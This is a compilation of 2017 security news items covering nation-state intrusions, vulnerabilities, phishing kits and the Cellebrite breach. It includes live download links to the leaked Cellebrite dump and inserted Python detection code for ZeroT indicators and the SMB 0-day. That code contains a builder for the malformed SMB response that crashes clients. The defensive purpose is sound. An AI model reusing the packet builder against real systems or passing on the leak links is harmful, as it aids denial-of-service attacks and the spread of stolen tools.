Tallinn 2.0 incorporates Tallinn 1.0, published in 2012. While Tallinn 1 sought to define how international law relates to cyberwar, Tallinn 2 expands the content to include cyber activity that falls short of actual warfare. To reflect this expansion in content, the name has changed from 'applicable to cyber warfare' to 'applicable to cyber operations'.

The Tallinn Manual takes no moral standpoint. It starts from the observation that cyber operations are subject to existing pre-cyber international law, and then defines how that law should be applied to different cyber operations. This forces it to confront many of the apparent difficulties in international cyber behavior head on -- such as the applicability of self-defense and the right to strike back, and attribution.

The Tallinn Manual process is led by Michael Schmitt, an expert in the law of armed conflict, Professor of Public International Law at Exeter Law School, and a Senior Fellow at the United States Naval War College. It is authored by nineteen international law experts. Although it has no legal standing and does not represent the views of NATO per se, it has become an influential resource for legal advisers dealing with cyber issues.

Schmitt told SecurityWeek that the Manual 1.0 publication became far more popular than was expected. He thought one reason was that it provided a legal position that didn't force governments to declare their own preference. "Governments," he suggested, "want to set legal bars high for potential aggressors while setting them as low as possible for themselves." The Manual takes away that dilemma by presenting the existing legal position under international law.


Tallinn 2.0 expands this legal exploration beyond cyber warfare into civilian situations. This makes it more complex because it includes the multitude of cyber intrusions faced by commercial organizations every day. But it is international law rather than any national law that is explored.

For example, there is growing enthusiasm for the right for private industry to strike back at aggressors, almost as an extension of self-defense. The law, however, is relatively simple -- they cannot. Schmitt gave an example. "If a foreign nation launched an attack against Exeter University, there would be a right for retaliatory action; but not by Exeter University. The attack could be considered as an attack against the UK; but only the UK government could respond."

Attribution is another difficult area. The law cannot be applied against a transgressor if the transgressor is not definitively known. There have been attempts to develop acceptable methods of attribution; most notably perhaps by Microsoft. Microsoft's proposal would be for an international committee of independent experts who would decide on and name transgressors.

Schmitt is not a great supporter of this approach; not because it is bad, but because it ultimately depends on recommendations. The law is not about recommendations, but about clear mandates. "I don't know about technical attribution," he told SecurityWeek. "I've heard arguments that it is and it is not possible. But whenever I talk to intelligence agencies, they all say attribution is not based on simple technology, but on the summation of intelligence information -- signals intelligence, field agents, geopolitics and so on."

Once a government is confident in its attribution -- and particularly if other governments agree with that attribution -- then the Tallinn Manual can explain the legally permissible response.

Tallinn 2, explains the associated CCDCOE announcement, "covers a full spectrum of international law applicable to cyber operations ranging from peacetime legal regimes to the law of armed conflict, covering a wide array of international law principles and regimes that regulate events in cyberspace. Some pertain to general international law, such as the principle of sovereignty and the various bases for the exercise of jurisdiction. The law of state responsibility, which includes the legal standards for attribution, is examined at length. Additionally, numerous specialised regimes of international law, including human rights law, air and space law, the law of the sea, and diplomatic and consular law, are examined in the context of cyber operations."

Tallinn Manual 2.0 is available from Cambridge University Press.


Hacker leaked tools stolen from mobile forensics company Cellebrite
4.2.2017 thehackernews Mobil

The hacker that breached the systems of the mobile forensics company Cellebrite leaked online some tools and announced further releases.
In January the Israeli mobile phone data extraction company Cellebrite was hacked; the company had made headlines during the dispute between Apple and the FBI over the San Bernardino shooter’s iPhone.

The main product of the company is the Universal Forensic Extraction Device (UFED), a device that can extract data (i.e. SMS messages, emails, call logs) from a huge number of different models of mobile phones.


The experts are still investigating the case; meanwhile, Cellebrite has confirmed the security breach. The company confirmed that someone accessed its systems and stole roughly 900 Gb of data, mainly composed of log data from its end-user licensing system my.Cellebrite and other sensitive data. The archive also includes 350 Gb of offline world map backups. According to the company, the attackers did not obtain “full passwords” or payment information, although it has admitted that some password hashes were stolen.

“Contrary to some erroneous reports, the attack did not impact any Cellebrite intellectual property related to the delivery of Cellebrite Forensic products and services, such as proprietary source code,” reads an announcement issued by the company. “There is no increased risk to Cellebrite Forensic customers as a result of normal, ongoing use of Cellebrite UFED software and hardware, including routine software updates.”

According to the company, hackers accessed just some password hashes and information on closed technical support inquiries.

The hacker decided anyway to publish not only information contained in the archive, but also exploits for Android, iOS, and BlackBerry mobile devices.

According to Motherboard, forensics expert Jonathan Zdziarski, who analyzed the dump, confirmed that many of the exploits for iOS devices are widely available tools; for this reason he declines to call them “exploits.”

The hacker promptly responded to Zdziarski via Pastebin, confirming that the Apple tools are widely available but adding that the BlackBerry files are not publicly available.

“The more discerning eye will notice that some of the Apple exploits bear a remarkable resemblance to those available to any teenager interested in the jailbreaking scene; perhaps not all those tax dollars have been wasted, the Blackberry epr is still worth a look at,” states the hacker.

“The files referenced here are part of the distribution package of our application and are available to our customers. They do not include any source code.” wrote a spokesperson for Cellebrite in an email sent to Motherboard.

He added that the company monitors new research from academia and the information security community, including “newly published forensic methods, research tools and publicly documented issues, including ‘jailbreaks,’ which enable platform research.”

The hacker plans to release a small sample of files retrieved via the weaponized Cellebrite update service deployed on MS Windows based devices and desktops (SYSTEM privs) within the customer infrastructure.

“Analysis of the compression and obfuscation employed by Cellebrite on products supplied to British MOD juxtaposed with the protection free versions supplied to SOCOM and others is also included within.” added the hacker.

The download links are:

https://mega.nz/#!sZUkSbDT!l740KTf5TG-TgjN-YNZcejSOfhUn43jZ8jR3Lw_w7dY

https://mega.nz/#!0d9zBQLI!DdKhZDXoMEnO6RpZDHWMGVV7nBXXZ98cPzjzVqLsVuw


Russian APT 29 group launched cyber attacks against Norwegian authorities
4.2.2017 securityaffairs APT

The Norwegian intelligence agency PST is one of the targets of spear phishing attacks launched by the Russian APT 29 group.
The dreaded Russian APT 29 group is back: the Norwegian authorities accuse Russia of cyber attacks that hit the foreign ministry, the intelligence service and other institutions.

“Nine different email accounts were targeted in an attempt at what is called spear phishing, in other words malicious emails,” confirmed Arne Christian Haugstoyl, an official with Norway’s intelligence service PST, in an interview with the television channel TV2.

Norway was informed of the ongoing attacks by an allied state. It is currently investigating the case, but the motivation behind the attack is still unclear.

“It’s difficult to know what the goal” was, he added.

Although legislative elections are scheduled for September 2017, experts believe that the attacks are not linked to the vote.

The APT 29 group is likely interested in Norway’s NATO membership, especially in the wake of the Ukraine crisis.

Recently the Norwegian Government also allowed the deployment of 300 US soldiers on its soil.

The Norwegian official confirmed that the APT 29 group has links to the Russian authorities; the hackers are also accused of interfering with the recent US Presidential Election.


At the time of writing it was not clear whether the hackers had exfiltrated sensitive information; according to Verdens Gang (VG), PST spokesman Martin Bernsen said there was “no reason to believe that classified information had been obtained in connection with the attack.”

According to the Norwegian Government, the hackers also targeted the national radiation protection agency, the parliamentary group of the Labour party and a school.

Recently Moscow refused visas to two senior Norwegian lawmakers, a decision considered by the Government of Oslo as “unjustifiable”.

Moscow explained the visa refusal was its response to Norway’s position on the EU economic sanctions against Russia over the Ukraine crisis.


Windows SMB 0-Day Exposes Systems to Attacks

3.2.2017 securityweek Vulnerebility

A 0-day memory corruption vulnerability discovered in the SMB (Server Message Block) protocol can be exploited to cause denial of service or potentially execute arbitrary code on a vulnerable system.

According to the United States Computer Emergency Readiness Team (US-CERT), which has already published an advisory on the matter, the bug resides in the manner in which Windows handles SMB traffic and can be exploited by remote, unauthenticated attackers for nefarious purposes.

SMB (one of its versions was also known as Common Internet File System, or CIFS), operates as an application-layer network protocol designed to allow machines to access files, printers, serial ports, and miscellaneous communications between nodes on a local network, while also offering an authenticated inter-process communication mechanism.

According to US-CERT, the Windows platform fails to properly handle a server response containing too many bytes following the structure defined in the SMB2 TREE_CONNECT Response structure. Thus, when a vulnerable Windows client system connects to a malicious SMB server, it can crash (Blue Screen of Death or BSOD) in mrxsmb20.sys.

The advisory also notes that the vulnerability has been already confirmed as being exploitable in denial of service attacks, but that it’s not clear whether it could be exploited further. By exploiting the vulnerability, an attacker might also be able to execute arbitrary code with Windows kernel privileges, US-CERT warns.

“We have confirmed the crash with fully-patched Windows 10 and Windows 8.1 client systems. Note that there are a number of techniques that can be used to trigger a Windows system to connect to an SMB share. Some may require little to no user interaction,” the advisory also notes.

With exploit code for the vulnerability already publicly available but no practical solution to this problem known at this time, suggested workarounds include blocking outbound SMB connections (TCP ports 139 and 445 along with UDP ports 137 and 138) from the local network to the WAN.

The vulnerability has a base Common Vulnerability Scoring System (CVSS) score of 10.0. It has been publicly reported by @PythonResponder, who says that Windows Server 2012 and 2016 versions are also affected. Proof-of-concept code has been published on GitHub.
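As an added defender-side illustration, not code from US-CERT or the article, the following Python checks a captured SMB2 response for exactly the condition the advisory describes: a TREE_CONNECT response carrying more bytes than the 16-byte structure that MS-SMB2 defines. The constants come from the MS-SMB2 specification; the sample messages are constructed, and a sensor would feed the function the bytes of each server response read from a TCP 445 stream.

```python
import struct

# Constants from the MS-SMB2 specification (not from the advisory text).
SMB2_MAGIC = b"\xfeSMB"
SMB2_HEADER_LEN = 64
SMB2_TREE_CONNECT = 0x0003
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001   # set on every response
TREE_CONNECT_RESPONSE_LEN = 16            # fixed StructureSize of the response


def parse_smb2_message(data):
    """Split one NetBIOS-framed SMB2 message into (command, flags, body).

    Returns None for anything that is not a well-formed SMB2 header. If the
    header chains a further command (NextCommand != 0) the body is cut at that
    offset so each compounded response is measured on its own.
    """
    if len(data) < 4 + SMB2_HEADER_LEN:
        return None
    nb_len = int.from_bytes(data[1:4], "big")      # NetBIOS session header
    msg = data[4:4 + nb_len]
    if len(msg) < SMB2_HEADER_LEN or msg[:4] != SMB2_MAGIC:
        return None
    structure_size, = struct.unpack_from("<H", msg, 4)
    if structure_size != SMB2_HEADER_LEN:
        return None
    command, = struct.unpack_from("<H", msg, 12)
    flags, = struct.unpack_from("<I", msg, 16)
    next_command, = struct.unpack_from("<I", msg, 20)
    end = next_command if next_command else len(msg)
    return command, flags, msg[SMB2_HEADER_LEN:end]


def tree_connect_excess_bytes(data):
    """Bytes beyond the 16-byte TREE_CONNECT Response structure, or 0.

    A positive value is the condition US-CERT describes: a server reply that
    carries more data than the structure allows, which a vulnerable client
    fails to handle. Non-SMB2 data and other commands yield 0.
    """
    parsed = parse_smb2_message(data)
    if parsed is None:
        return 0
    command, flags, body = parsed
    if command != SMB2_TREE_CONNECT or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        return 0
    return max(0, len(body) - TREE_CONNECT_RESPONSE_LEN)


def build_tree_connect_response(extra=b""):
    """Constructed sample: a minimal TREE_CONNECT response plus `extra` bytes."""
    header = SMB2_MAGIC + struct.pack(
        "<HHIHHIIQIIQ",
        SMB2_HEADER_LEN,             # StructureSize
        0,                           # CreditCharge
        0,                           # Status = STATUS_SUCCESS
        SMB2_TREE_CONNECT,           # Command
        1,                           # CreditResponse
        SMB2_FLAGS_SERVER_TO_REDIR,  # Flags
        0,                           # NextCommand
        1,                           # MessageId
        0,                           # Reserved
        1,                           # TreeId
        0x1234,                      # SessionId
    ) + b"\x00" * 16                 # Signature
    # StructureSize=16, ShareType=DISK, Reserved, ShareFlags, Capabilities, MaximalAccess
    body = struct.pack("<HBBIII", TREE_CONNECT_RESPONSE_LEN, 1, 0, 0, 0, 0x001F01FF)
    msg = header + body + extra
    return b"\x00" + len(msg).to_bytes(3, "big") + msg


if __name__ == "__main__":
    print(tree_connect_excess_bytes(build_tree_connect_response()))             # 0
    print(tree_connect_excess_bytes(build_tree_connect_response(b"A" * 1000)))  # 1000
```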


Chinese Cyberspies Target Russia With New Malware

3.2.2017 securityweek Virus
A China-linked cyber espionage group has been using new malware and new techniques in attacks aimed at military and aerospace organizations in Russia and Belarus.

In July 2016, security firm Proofpoint reported that the threat actor had been using NetTraveler (aka TravNet) and the PlugX RAT to target Russia and neighboring countries. Researchers now revealed that, at around the same time, the group started using a new downloader, dubbed ZeroT, and Microsoft Compiled HTML Help (.chm) files to deliver PlugX.

Attackers sent victims .chm files containing an HTM file and an executable. When the help file is opened, a Russian-language text is displayed and the victim is asked by the User Account Control (UAC) feature in Windows to allow the execution of an “unknown program.” If the user clicks “Yes,” the ZeroT downloader is dropped onto the system.

Similar to earlier attacks, the APT actor also used specially crafted Word documents created with an exploit generator named MNKit. This Office exploit generator has allowed researchers to find connections between several different groups believed to be operating out of China.

The emails and files used as bait often referenced the Commonwealth of Independent States (CIS), which is an alliance of former Soviet Union countries, Russian government programs, and Russia’s defense industry.

The threat group has also used self-extracting RAR archives to deliver ZeroT. Many of these archives included an executable named “Go.exe,” which leverages the Event Viewer tool in Windows to bypass UAC.

Once it infects a system, ZeroT contacts its command and control (C&C) server, and uploads information about the infected system. ZeroT then downloads a previously known variant of the PlugX RAT, either directly as a non-encoded PE payload or as a Bitmap (.bmp) image file that uses steganography to hide the malware.

Proofpoint said the C&C domains used by ZeroT have also been seen in NetTraveler attacks. The PlugX samples leveraged some of the C&C domains observed in a 2015 campaign.

Following the indictment of People's Liberation Army (PLA) officers, threats of economic sanctions, and the agreement made by the U.S and China in 2015, security firms reported that the volume of Chinese attacks aimed at the United States dropped significantly.

However, researchers pointed out that China-linked threat groups have continued to target other regions, such as Europe and Russia.


Norway Accuses Russia of Cyberattack

3.2.2017 securityweek Cyber
Oslo - Norway's foreign ministry, army and other institutions were targeted in a recent cyberattack by a group suspected of ties to Russian authorities, Norwegian intelligence -- which was among the targets -- said Friday.

Known as APT 29, the group singled out by Oslo has already been accused of hacking interference in the US election last year.

"Nine different email accounts were targeted in an attempt at what is called spear phishing, in other words malicious emails," Arne Christian Haugstoyl, an official with Norway's intelligence service PST, told television channel TV2.

"It's difficult to know what the goal" of the operation was, he said, adding that Norway was alerted to the attack by an allied country.

He described APT 29 as a group "with links to the Russian authorities".

PST spokesman Martin Bernsen, quoted by daily Verdens Gang (VG), said there was "no reason to believe that classified information had been obtained in connection with the attack."

In addition to the foreign ministry, the army and PST itself, the attack -- the date of which was not disclosed -- also targeted the Norwegian radiation protection agency, a school and the parliamentary group of the Labour party, the traditionally dominant political party in Norway but which is currently in opposition.

Legislative elections are scheduled for September 11, though no link has been made to the vote.

Norway, a NATO member, and its neighbor Russia normally enjoy good relations but ties have grown more tense in the wake of the Ukraine crisis.

The Scandinavian country on Wednesday summoned the Russian ambassador to lodge a protest after Moscow refused visas to two senior lawmakers in a move Oslo denounced as "unjustifiable".

Russia said the visa refusal was a reaction to Norway's participation in EU economic sanctions against it over the Ukraine crisis.

Moscow was also angered by the recent deployment of some 300 US soldiers on Norwegian soil.


Several Flaws Patched in Honeywell Controllers

3.2.2017 securityweek Vulnerebility
Honeywell has released updates for its XL Web II controllers to address several critical and high severity vulnerabilities that can be exploited remotely from the Internet.

XL Web II or Excel Web II controllers, which are also sold under the Falcon brand, are web-based SCADA (supervisory control and data acquisition) systems designed for building management applications.

Security researcher Maxim Rupp discovered last summer that the product is affected by flaws that allow a remote attacker to obtain sensitive information and use the affected system as an entry point into the targeted organization’s network.

Rupp told SecurityWeek that, using the Shodan search engine, he has identified more than 600 vulnerable devices accessible from the Internet.

ICS-CERT has published an advisory describing the vulnerabilities, but the researcher says there are some inaccuracies. According to the expert’s own report, the flaws affect XL20xxBxx controllers running firmware version XLWeb2_vUBC_3-04-04-07 and prior, and CLEA20xxBxx devices running firmware version Eagle_vUBC_3-04-04-07 and prior.

The most serious of the flaws, rated critical based on their CVSS score, are related to exposed credentials. The expert discovered that the application stores passwords in easily accessible JavaScript files for client-side verification (CVE-2017-5140). These passwords are stored in clear text (CVE-2017-5139) and an attacker can access them without authentication.

Another vulnerability rated critical is an improper privilege management issue (CVE-2017-5142) that allows a user with limited privileges to access certain functions simply by navigating to a specific URL. These functions are normally accessible only to users with higher privileges.

Rupp has also discovered a high severity path traversal flaw (CVE-2017-5143) that allows an unauthenticated attacker to gain access to files that can contain sensitive information.

ICS-CERT’s advisory also mentions a medium severity session fixation flaw that could allow an attacker to gain access to a targeted user’s account (CVE-2017-5141). Rupp said this vulnerability was not included in his report and that it likely refers to a combination of weaknesses.

According to the researcher and ICS-CERT, Honeywell addressed the vulnerabilities with the release of version 3.04.05.05. Users can obtain the patches by contacting their vendor. There is no evidence that the flaws have been exploited in the wild.


Chinese state-sponsored hackers targets Russia and Belarus with ZeroT and PlugX
3.2.2017 securityaffairs Hacking

According to the firm Proofpoint, Chinese state-sponsored actors continue to spy on military and aerospace organizations in Russia and Belarus.
Chinese state-sponsored actors are spying on military and aerospace interests in Russia and Belarus. According to experts from Proofpoint, the attacks began in the summer of 2016, when the Chinese hackers launched a spear-phishing campaign leveraging a new downloader known as ZeroT to deliver the PlugX RAT.

Researchers explained that in the past the same threat actors conducted spear-phishing campaigns using Microsoft Word attachments that exploited CVE-2012-0158, or messages containing malicious URLs pointing to .rar-compressed executables.


The Proofpoint analysis revealed that Russian firms are among the targets of the group.

The Chinese hackers switched tactics for spying on Russian jet makers once the development of the ZeroT malware was complete.

“Most recently, we have observed the same group targeting military and aerospace interests in Russia and Belarus.” reads the analysis published by ProofPoint. “Since the summer of 2016, this group began using a new downloader known as ZeroT to install the PlugX remote access Trojan (RAT) and added Microsoft Compiled HTML Help (.chm) as one of the initial droppers delivered in spear-phishing emails.”

The analysis of the ZeroT malware revealed that it uses obfuscation techniques to avoid detection; a significant number of the samples analyzed by the experts contained a file named Go.exe, which performs a Windows UAC bypass.

ZeroT communicates with its C&C server over HTTP and uses a fake User-Agent in all requests: “Mozilla/6.0 (compatible; MSIE 10.0; Windows NT 6.2; Tzcdrnt/6.0)”, with “Tzcdrnt” possibly being a typo of “Trident.” “In all the samples we observed, ZeroT first beacons to index.php expecting an RC4-encrypted response using a static key: ‘(*^GF(9042&*’,” the analysis continues.
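Two things a defender can do with the indicators quoted above, shown as an added Python example that is not Proofpoint's code: flag proxy log lines whose User-Agent carries the "Tzcdrnt" typo, and decode a captured index.php reply with the static RC4 key. The log format, host names and addresses are constructed for the example.

```python
import re

# Indicators quoted in the Proofpoint write-up above.
ZEROT_USER_AGENT = "Mozilla/6.0 (compatible; MSIE 10.0; Windows NT 6.2; Tzcdrnt/6.0)"
ZEROT_RC4_KEY = b"(*^GF(9042&*"

# Constructed proxy log lines (hypothetical hosts and addresses), one per line:
# <timestamp> <client-ip> <method> <url> "<user-agent>"
SAMPLE_PROXY_LOG = """\
2017-02-03T10:15:02Z 10.1.2.33 GET http://c2.example.invalid/index.php "Mozilla/6.0 (compatible; MSIE 10.0; Windows NT 6.2; Tzcdrnt/6.0)"
2017-02-03T10:15:05Z 10.1.2.40 GET http://www.example.com/ "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
2017-02-03T10:16:11Z 10.1.2.33 GET http://c2.example.invalid/index.php "Mozilla/6.0 (compatible; MSIE 10.0; Windows NT 6.2; Tzcdrnt/6.0)"
"""

LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')


def flag_zerot_requests(log_text):
    """Return (timestamp, client_ip, url) for every request whose User-Agent
    is the ZeroT string or at least contains its tell-tale "Tzcdrnt/" token.
    A genuine Internet Explorer UA says "Trident/", so the typo is the signal."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts, ip, _method, url, ua = m.groups()
        if ua == ZEROT_USER_AGENT or "Tzcdrnt/" in ua:
            hits.append((ts, ip, url))
    return hits


def rc4(key, data):
    """Plain RC4; the cipher is symmetric, so one call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # keystream generation and XOR
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_beacon_response(ciphertext):
    """Recover the plaintext of an index.php reply using ZeroT's static key."""
    return rc4(ZEROT_RC4_KEY, ciphertext)


if __name__ == "__main__":
    for ts, ip, url in flag_zerot_requests(SAMPLE_PROXY_LOG):
        print(f"{ts} {ip} -> {url}  (ZeroT User-Agent)")
    # Constructed sample: a reply encrypted with the static key, then decoded.
    captured = rc4(ZEROT_RC4_KEY, b"constructed-beacon-reply")
    print(decode_beacon_response(captured))
```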

Chinese nation-state hackers tied to the PLA have in the past targeted US and European firms in the aerospace industry.

Chinese hackers were behind the cyber espionage campaign on the Lockheed Martin F-35 Joint Strike Fighter that caused the arrest of a Chinese national.

In July 2016, the US sentenced the Chinese hacker involved in the theft of industrial secrets on the F-22 and F-35 fighter jets and the C-17 transport aircraft.

Military experts know very well that many Russian and US jets are almost identical to the ones developed by China.


Authentication Bypass Vulnerability found in Cisco Prime Home product
3.2.2017 securityaffairs Vulnerebility

Cisco experts discovered a critical authentication bypass vulnerability in Cisco Prime Home during internal security testing.
Cisco has released a security update for the Cisco Prime Home remote management and provisioning solution to fix a flaw that could be exploited to bypass authentication. Cisco experts discovered the critical flaw during internal security testing.

Cisco Prime Home is a product used by Internet service providers (ISPs) to view customers’ home networks; it lets them make configuration changes and software upgrades and can be used for remote diagnostics.

The flaw, tracked as CVE-2017-3791, resides in the web-based user interface of the Cisco Prime Home, it can be remotely exploited by an unauthenticated attacker to bypass authentication and execute any action with administrator privileges.

“The vulnerability is due to a processing error in the role-based access control (RBAC) of URLs. An attacker could exploit this vulnerability by sending API commands via HTTP to a particular URL without prior authentication.” states the Cisco advisory. “An exploit could allow the attacker to perform any actions in Cisco Prime Home with administrator privileges.”


The flaw affects Cisco Prime Home versions 6.3, 6.4 and 6.5; versions 5.2 and earlier are not impacted. Cisco fixed the issue in version 6.5.0.1. It is important to highlight that no workaround is available.

The experts at the Cisco Product Security Incident Response Team (PSIRT) are not aware of any public announcements or exploitation of the flaw.


Hacker Leaks Tools Stolen From Cellebrite

3.2.2017 securityweek Hacking
The hacker who recently breached the systems of Israel-based mobile forensics company Cellebrite leaked some tools on Thursday and promised to dump more of the stolen data in the future.

While its investigation is still ongoing, Cellebrite has confirmed that someone had gained unauthorized access to its systems, stealing roughly 900 Gb of data.

According to the company, most of the data represents logs from its end-user licensing system my.Cellebrite and other unimportant files, such as 350 Gb of offline world map backups.

The compromised data does include customer contact information from a my.Cellebrite backup, but the company says “full passwords” or payment information have not been obtained – although it has admitted that some password hashes have been stolen.

Cellebrite also admitted that the hacker gained access to information on technical support inquiries, but claims the exposed files are not related to open support cases.

“Contrary to some erroneous reports, the attack did not impact any Cellebrite intellectual property related to the delivery of Cellebrite Forensic products and services, such as proprietary source code,” the company stated. “There is no increased risk to Cellebrite Forensic customers as a result of normal, ongoing use of Cellebrite UFED software and hardware, including routine software updates.”

In an effort to prove that he had stolen much more than just basic contact information, the hacker leaked what he claims to be “exploits” for iOS, Android and BlackBerry devices.

The download links no longer work, but Vice’s Motherboard learned from forensics expert Jonathan Zdziarski that many of the leaked iOS-related files appear to be widely available tools from the jailbreaking community. Zdziarski said he would not call the leaked files “exploits.”

In a message posted on Pastebin, the hacker admitted that the Apple tools are widely available, but claimed that the BlackBerry tools are “worth a look at.”

Cellebrite told Motherboard that the tools leaked this week are part of the distribution package of its application, but reiterated that source code was not compromised.

The hacker said he also plans on leaking what he describes as “a sample of files retrieved via the weaponized Cellebrite update service deployed on MS Windows based devices and desktops (SYSTEM privs) within the customer infrastructure.”


SQL Slammer Worm Crawls Back

3.2.2017 securityweek Virus
SQL Slammer, a tiny worm that managed to wreak havoc across the Internet on January 25, 2003, appears to have recommenced activity, Check Point security researchers warn.

The computer worm was first spotted on the day it caused a denial of service condition on tens of thousands of servers worldwide by overloading Internet objects such as servers and routers with a massive number of network packets. Within 10 minutes of its first emergence, SQL Slammer had managed to infect most of its roughly 75,000 victims.

SQL Slammer was based on proof-of-concept code demonstrated at the Black Hat Briefings by David Litchfield, who discovered a buffer overflow bug in Microsoft's flagship SQL Server and Desktop Engine database products. Although the vulnerability had been patched by Microsoft six months before the worm hit, many installations weren’t patched, and the malicious code could easily propagate.

Also referred to as the Sapphire Worm and Helkern, SQL Slammer is only 376 bytes in size, so it fits inside a single packet, a property that let it propagate extremely quickly when it hit. The worm sent a formatted request to UDP port 1434 and caused infected routers to start sending the malicious code to random IP addresses, which resulted in a denial of service condition on targets.

Although it remained dormant for over a decade, SQL Slammer appears to have restarted activity, Check Point security researchers warn. According to data collected by Check Point, there was a massive increase in the number of attack attempts between November 28 and December 4, 2016. SQL Slammer was one of the top malware detected in the timeframe.

Chart of SQL Slammer Infections (Image Credit: Check Point)

The observed attack attempts targeted 172 countries, with 26% of the attacks aimed at networks in the United States. According to Check Point, this shows that the newly recorded SQL Slammer activity was not a targeted attack but rather a larger wave of attacks.

The security firm also notes that the largest number of attack attempts came from IP addresses located in China, Vietnam, Mexico, and Ukraine.

“To summarize, although the Slammer worm was primarily spread during 2003, and has barely been observed in the wild over the last decade, the massive spike in propagation attempts that was observed in our data leads us to wonder – is the worm trying to make a comeback?” Check Point concludes.


PayPal Phishing Attack Immediately Verifies Credentials

3.2.2017 securityweek Phishing
A newly observed phishing campaign targeting PayPal users employs checks to immediately verify whether the entered login credentials are legitimate or not, Proofpoint reveals.

Using email as the distribution method, attackers lured users to a well-crafted phishing page that appeared to be a legitimate PayPal login page, but was actually the first step in an elaborate scheme meant to trick users into revealing their banking and personal information. (The attack is different from a separate sophisticated phishing campaign targeting PayPal users detailed earlier this week.)

The phishing page, researchers say, returns a “vaguely worded error message” if the wrong credentials are entered, something that doesn’t usually happen with phishing landing pages, as they tend to accept any credentials that users enter. The newly observed page, however, verifies the entered credentials with PayPal before moving forth with the scheme.

To perform the check, the crooks were using a decommissioned service in PayPal, meant to allow one to purchase a gift card from a user. “If the queried email account does not exist, the login supplied to the phishing landing page is discarded, helping to ensure that the phisher gets a higher percentage of valid credentials. The code does not check the password, only that the email account exists on PayPal,” Proofpoint researchers note.

Usually, scammers verify the stolen credentials after they managed to acquire a larger number of potential logins, but the new approach eliminates the need to perform the validation at a later date. On top of that, researchers say, this specific approach can fool automated analysis tools.

Once a valid PayPal email address is used, the victim is presented with a reassuring welcome page, followed by a phishing page on which users are required to confirm the credit card information they have associated with their PayPal account. Because the phishing kit comes with support for multiple languages, it can appear legitimate to users in many locations.

The phishing kit was also designed to check the credit card number that the victim supplies, making sure it passes the Luhn algorithm, as well as to perform a lookup against the card number to retrieve additional information. After validating the credit card, the kit asks the victim to enter security information about their card.

Users are also asked to link their bank accounts to their PayPal account, and are offered a number of well-known retail banks to choose from. Stolen bank branding gives the phishing page a legitimate look. Next, the user is asked to enter login credentials for their bank, claiming that the information is not saved, which is, of course, fraud.

“The user is then prompted for routing information for the bank account. Finally, the phishing kit prompts the user for identity information such as a driver's license number or other identifying document that can be uploaded directly to the phishing kit. If the victim clicks the ‘Don't have your ID now?’ button, they simply skip this screen,” Proofpoint said.

After attempting to gather all of the aforementioned personal and financial information from the victims, the phishing kit then redirects them to the legitimate PayPal website. According to Proofpoint, in addition to using inventive phishing pages, the scheme uses an administrative backend similar to what remote access Trojans (RATs) usually employ.

Through this panel, attackers can view visitor information, access the stolen credentials, and modify settings via a simple administrator interface. There is even the option to enable a “selfie page” where Flash is used to interact with the victim's webcam, most probably to allow the phisher to snap a photo of the victim for later use. The admin panel even features a page for Trojans, but the feature appears to be under development.

“As attackers continue to turn away from the use of exploits and other means of compromising victim PCs and stealing information via malware, they are developing increasingly sophisticated means of collecting credentials and other data directly through phishing schemes. The use of phishing kits like the one detailed here provides threat actors with ready access to turnkey templates and administrative backends that make harvesting data from unsuspecting victims all too easy,” Proofpoint says.

The phishing kit also illustrates the advanced state of “crimeware as a service” and how straightforward conducting phishing scams can be. The existence of an admin panel with the aforementioned options is quite rare among credential phishing kits at the moment, but similar panels were previously associated with APT activities. However, this type of admin panel is expected to become more common and, understandably, popular with phishing actors, Proofpoint concludes.


Radio Stations Hacked to Play "F**k Donald Trump" on Repeat Across the Country
3.2.2017 thehackernews Hacking
It’s just two weeks into the Trump presidency, but his decisions have caused utter chaos around the country.
One such order signed by the president banned both refugees and visa holders from seven Muslim-majority countries (Iraq, Iran, Libya, Yemen, Somalia, Syria, and Sudan) from entering the United States, resulting in the unexpected arrest of some travelers at airports.
Now, it seems some anti-Trump protesters have publicly declared their fight against the president by exploiting a known flaw in low power FM (LPFM) radio transmitters to play a song the radio stations didn't intend to broadcast.
Radio stations in South Carolina, Indiana, Texas, Tennessee and Kentucky were recently hacked to broadcast "Fuck Donald Trump," the anti-Trump song by Bompton-based rapper YG and Nipsey Hussle, which was already a radio hit in some parts of the country last year, several sources report.
The song was played repeatedly on Monday night, according to RadioInsight, and news of the incident began emerging shortly after Trump's inauguration on January 20, eight days before hackers hacked 70 percent of the police CCTV cameras in Washington DC.
Hackers gained access to the radio stations by exploiting known vulnerabilities in Barix Exstreamer devices which can decode audio file formats and send them along for LPFM transmission.
Over a dozen radio stations experienced the hack in recent weeks, though some of them shut down their airwaves as quickly as possible in an attempt to avoid playing the inflammatory "FDT (Fuck Donald Trump)" song on loop.
The hacker or group of hackers behind the attack is still unknown. The affected stations so far include:
105.9 WFBS-LP Salem, S.C.
Radio 810 WMGC/96.7 W244CW Murfreesboro TN
101.9 Pirate Seattle
100.9 WCHQ-LP Louisville
100.5 KCGF-LP San Angelo TX
There are also unconfirmed reports that radio stations in California, Indiana, and Washington State were affected.
Have any of the radio stations you listen to been hit by the hackers? Let us know in the comments!


Critical McAfee ePO Flaw Ideal For Reconnaissance

3.2.2017 securityweek Vulnerability
Intel Security has fixed a critical vulnerability in its McAfee ePolicy Orchestrator (ePO) centralized security management product. Researchers warn that the flaw is ideal for profiling the users and infrastructure of an organization.

The flaw, tracked as CVE-2016-8027 and assigned a CVSS score of 10.0, is a blind SQL injection discovered by a member of the Cisco Talos Vulnerability Development Team. The security hole can be triggered using specially crafted HTTP POST requests and it allows an unauthenticated attacker to obtain information from the application database.

McAfee ePO allows organizations to manage their security policies from a central console. The solution requires the deployment of agents on each endpoint, and these agents communicate over a proprietary protocol known as SPIPE.

The vulnerable component is in the application server and it can be reached directly via the administration console or over SPIPE. Researchers warned that exploitation of the flaw can also allow attackers to impersonate an agent, which can reveal information related to that agent.

